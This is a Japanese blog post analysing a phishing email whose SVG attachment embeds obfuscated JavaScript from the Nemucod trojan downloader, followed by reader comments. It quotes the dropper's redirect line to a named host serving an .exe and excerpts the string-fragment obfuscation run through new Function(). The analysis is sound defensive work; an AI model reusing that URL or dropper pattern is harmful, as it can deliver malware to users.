JS/TrojanDownloader.Nemucod.BZC という、トロイの木馬がやってきた(第二弾) - 大人の自由研究

大人の自由研究 ホーム » 未分類 » JS/TrojanDownloader.Nemucod.BZC という、トロイの木馬がやってきた(第二弾)

JS/TrojanDownloader.Nemucod.BZC という、トロイの木馬がやってきた(第二弾)


 今まで、そんな気にしないで、削除していた、トロイの木馬さん。
 またまた、届いた。
 タイトルが「 写真 ご送付いただきまして ありがとうございます」
 え?何も送付はしておりません。

 本文が
-----------------------
お世話になっております

写真で
ご確認ください。
取り直しお願いします。
-----------------------

 お世話もしておりません。
 添付ファイルが「P0038445118777_001.zip」
 中身は「P0039988439992_001.jpg.svg」

 今回は svg のようでした。

 svg って、画像のフォーマットかぁ。。。
 どうやら、JavaScriptも埋め込めるという危険な仕様らしいw

 早速、テキストエディタでファイルを覗いてみた。

 <image width="1000" height="900" xlink:href="data:image/jpeg;base64,/9j/4QZ7RXhpZgAATU0 ……
 確かにイメージは入っている。
 試しにデータの部分をbase64でdecodeしてみると画像は表示できた。
 こちら↓
 xfs_extension.exe トロイの木馬

 We do not support file format. For view - install the extension.

 なるほどね、

 画像が表示された後に、
window.location.href = 'http://juanpedroperez.com/fotos/photos/xfs_extension.exe';
 が実行されて、ダウンロードされると。

 今回の難読化は
function ahfavkiny() {
var ntucyru = "exoljo";
var svukdojna = "p:/";
return svukdojna;
}
function ychuhmu() {
var kwylydry = "uzorri";
var tjutirwebe = "n.e";
return tjutirwebe;
}
function htazax() {
var ubeti = "omqy";
var dwazati = "t(f";
return dwazati;
}
function hxajytof() {
var cnivlat = "olr";
var ejutwajg = ") {";
return ejutwajg;
}
 :
 :
 :
 たくさんのFunctionが用意されて、戻り値をつなげる事で、イケナイ実行コードを生成しているようです。

var kufurc = jsufabude() + amsewim() + urylresyg() + htazax() + ytrarputma() + aqopybu() + arijybhu() + hxajytof() + ddoxop() + powcoxtazqu() + ypvohyqhaqb() + ymdovukbicg() + fjipiskuqp() + kekqoffu() + ozqohokum() + okajah() + pijyp() + ahfavkiny() + ynyccu() + iqasna() + izquqmychepg() + mybado() + ulvotivsunt() + ofvari() + jguzxykhu() + ixsydulz() + exmeqfoq() + ucsefa() + ediqbuqn() + amdubnise() + ebapexecs() + ekboftygtu() + nikpisol() + ychuhmu() + zubat() + akquztilni() + onkapyfno() + obxotazwond() + uxcipymap();
new Function(kufurc)();



スポンサーサイト
コメント
非公開コメント

No title

同様のメールが届いたので、同じく難読化を解除してここに辿りつきました(゚∀゚)

2017-01-18 23:35 │ from 通りすがりURL

Re: No title

> 同様のメールが届いたので、同じく難読化を解除してここに辿りつきました(゚∀゚)

ご来訪ありがとうございます!
ここんとこ、良く届くんですよね(汗)

2017-01-19 10:40 │ from うっきぃHGURL

いつも有難うございます

明けましておめでとう御座います。
(随分たってしまいましたが・・ww)
今年も宜しくお願い致します。

怖い!ですね~♪
知らない所からのメールは、基本開かずに
即、ゴミ箱へいってますが・・ww
気をつけたいと思います♪
有難うです!!!

2017-01-19 11:13 │ from にゃんたーXURL

Re: いつも有難うございます

> 明けましておめでとう御座います。
> (随分たってしまいましたが・・ww)
> 今年も宜しくお願い致します。
>
> 怖い!ですね~♪
> 知らない所からのメールは、基本開かずに
> 即、ゴミ箱へいってますが・・ww
> 気をつけたいと思います♪
> 有難うです!!!

コメントありがとうございます。
ほんと、最近増えてる気がします。
同じ、難読化なので、飽きちゃいますね(汗)

2017-01-20 08:19 │ from うっきぃHGURL

トラックバック

http://ukkey3.blog33.fc2.com/tb.php/702-1e9467eb